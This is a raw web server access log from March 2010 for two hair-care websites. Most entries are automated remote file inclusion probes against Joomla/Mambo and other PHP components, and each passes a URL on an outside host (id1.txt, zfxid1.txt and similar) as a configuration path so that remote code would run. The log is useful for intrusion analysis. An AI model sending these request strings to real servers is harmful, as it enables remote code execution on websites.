195.9.14.88 - - [15/Mar/2010:06:58:14 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://suzuki01.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [15/Mar/2010:06:58:14 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://suzuki01.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
65.55.106.229 - - [15/Mar/2010:06:59:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.freehairsecrets.com"
195.9.14.88 - - [15/Mar/2010:07:03:33 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://suzuki01.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [15/Mar/2010:07:03:33 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://suzuki01.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [15/Mar/2010:07:03:33 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://suzuki01.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [15/Mar/2010:07:05:26 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://suzuki01.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [15/Mar/2010:07:05:26 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://suzuki01.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [15/Mar/2010:07:05:26 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://suzuki01.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.191.227.2 - - [15/Mar/2010:07:06:40 -0700] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
207.191.227.2 - - [15/Mar/2010:07:06:40 -0700] "GET /appserv/main.php?appserv_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
207.191.227.2 - - [15/Mar/2010:07:06:40 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
207.191.227.2 - - [15/Mar/2010:07:07:09 -0700] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
207.191.227.2 - - [15/Mar/2010:07:07:10 -0700] "GET /appserv/main.php?appserv_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
207.191.227.2 - - [15/Mar/2010:07:07:10 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:07:08:08 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://fcg.com.pl/www/system2/tmp/aut2.txt???? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "growlonghairfast.com"
207.46.204.180 - - [15/Mar/2010:07:10:37 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.freehairsecrets.com"
75.101.173.154 - - [15/Mar/2010:07:10:53 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
75.101.173.154 - - [15/Mar/2010:07:10:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15103 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
207.46.204.180 - - [15/Mar/2010:07:12:44 -0700] "GET /VitaminsforFasterHairGrowth.htm HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.freehairsecrets.com"
195.190.166.35 - - [15/Mar/2010:07:13:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.190.166.35 - - [15/Mar/2010:07:13:17 -0700] "GET /logs/access_091026.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.190.166.35 - - [15/Mar/2010:07:13:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.44.166.172 - - [15/Mar/2010:07:17:15 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.freehairsecrets.com"
194.44.166.172 - - [15/Mar/2010:07:17:15 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.freehairsecrets.com"
195.190.166.35 - - [15/Mar/2010:07:18:49 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.145.228 - - [15/Mar/2010:07:40:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.freehairsecrets.com"
94.23.145.228 - - [15/Mar/2010:07:40:29 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.freehairsecrets.com"
64.237.46.229 - - [15/Mar/2010:07:58:15 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.237.46.229 - - [15/Mar/2010:07:58:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.237.46.229 - - [15/Mar/2010:07:58:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.214.108.69 - - [15/Mar/2010:07:58:35 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.108.69 - - [15/Mar/2010:07:58:35 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.108.69 - - [15/Mar/2010:07:58:35 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.110.193.89 - - [15/Mar/2010:07:59:00 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.110.193.89 - - [15/Mar/2010:07:59:00 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.110.193.89 - - [15/Mar/2010:07:59:01 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.214.108.69 - - [15/Mar/2010:08:03:03 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.108.69 - - [15/Mar/2010:08:03:03 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.108.69 - - [15/Mar/2010:08:03:03 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.154.175 - - [15/Mar/2010:08:09:25 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.154.175 - - [15/Mar/2010:08:09:25 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.154.175 - - [15/Mar/2010:08:09:25 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
212.235.107.191 - - [15/Mar/2010:08:12:52 -0700] "GET /freehairsecretsphp/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00" "freehairsecrets.com"
195.56.65.232 - - [15/Mar/2010:08:17:06 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.56.65.232 - - [15/Mar/2010:08:17:06 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.56.65.232 - - [15/Mar/2010:08:17:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:26:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:26:04 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:26:04 -0700] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:27:32 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:27:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:27:32 -0700] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.77.223.114 - - [15/Mar/2010:08:29:44 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.77.223.114 - - [15/Mar/2010:08:29:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.77.223.114 - - [15/Mar/2010:08:29:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
91.212.226.210 - - [15/Mar/2010:08:31:55 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "growlonghairfast.com"
91.212.226.210 - - [15/Mar/2010:08:31:55 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:38:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:38:43 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:38:43 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:39:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:39:33 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:39:33 -0700] "GET /logs/access_090921.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:39:38 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:39:38 -0700] "GET /logs/access_090921.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:39:38 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:39:41 -0700] "GET /logs/access_091005.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:39:50 -0700] "GET /logs/access_091005.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:39:54 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:39:54 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:08:39:54 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [15/Mar/2010:08:40:36 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [15/Mar/2010:08:40:36 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [15/Mar/2010:08:40:37 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.114.222.95 - - [15/Mar/2010:08:42:47 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.114.222.95 - - [15/Mar/2010:08:42:47 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.114.222.95 - - [15/Mar/2010:08:42:47 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [15/Mar/2010:08:43:43 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [15/Mar/2010:08:43:43 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [15/Mar/2010:08:43:43 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [15/Mar/2010:08:44:12 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "freehairsecrets.com"
91.212.226.210 - - [15/Mar/2010:08:44:12 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "freehairsecrets.com"
211.241.24.100 - - [15/Mar/2010:08:44:16 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [15/Mar/2010:08:44:16 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [15/Mar/2010:08:44:17 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.24.129.58 - - [15/Mar/2010:08:45:30 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.24.129.58 - - [15/Mar/2010:08:45:30 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.24.129.58 - - [15/Mar/2010:08:45:34 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.47.237.17 - - [15/Mar/2010:08:47:11 -0700] "GET /logs/access_100125.log%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.47.237.17 - - [15/Mar/2010:08:47:11 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.47.237.17 - - [15/Mar/2010:08:47:11 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.63.130.106 - - [15/Mar/2010:08:47:36 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.63.130.106 - - [15/Mar/2010:08:47:37 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.63.130.106 - - [15/Mar/2010:08:47:37 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
118.129.166.213 - - [15/Mar/2010:08:48:28 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://222.231.1.41/~sjabca/dbclqn/bbs/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.213 - - [15/Mar/2010:08:48:28 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://222.231.1.41/~sjabca/dbclqn/bbs/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.213 - - [15/Mar/2010:08:48:28 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://222.231.1.41/~sjabca/dbclqn/bbs/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.47.237.17 - - [15/Mar/2010:08:52:17 -0700] "GET /logs/access.log%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.47.237.17 - - [15/Mar/2010:08:52:17 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.47.237.17 - - [15/Mar/2010:08:52:17 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.213 - - [15/Mar/2010:08:52:54 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://222.231.1.41/~sjabca/dbclqn/bbs/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.213 - - [15/Mar/2010:08:52:54 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://222.231.1.41/~sjabca/dbclqn/bbs/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.213 - - [15/Mar/2010:08:52:54 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://222.231.1.41/~sjabca/dbclqn/bbs/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.47.237.17 - - [15/Mar/2010:08:58:50 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.47.237.17 - - [15/Mar/2010:08:58:50 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.47.237.17 - - [15/Mar/2010:08:58:50 -0700] "GET /logs/access_100125.log%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:59:07 -0700] "GET /logs/access_091214.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
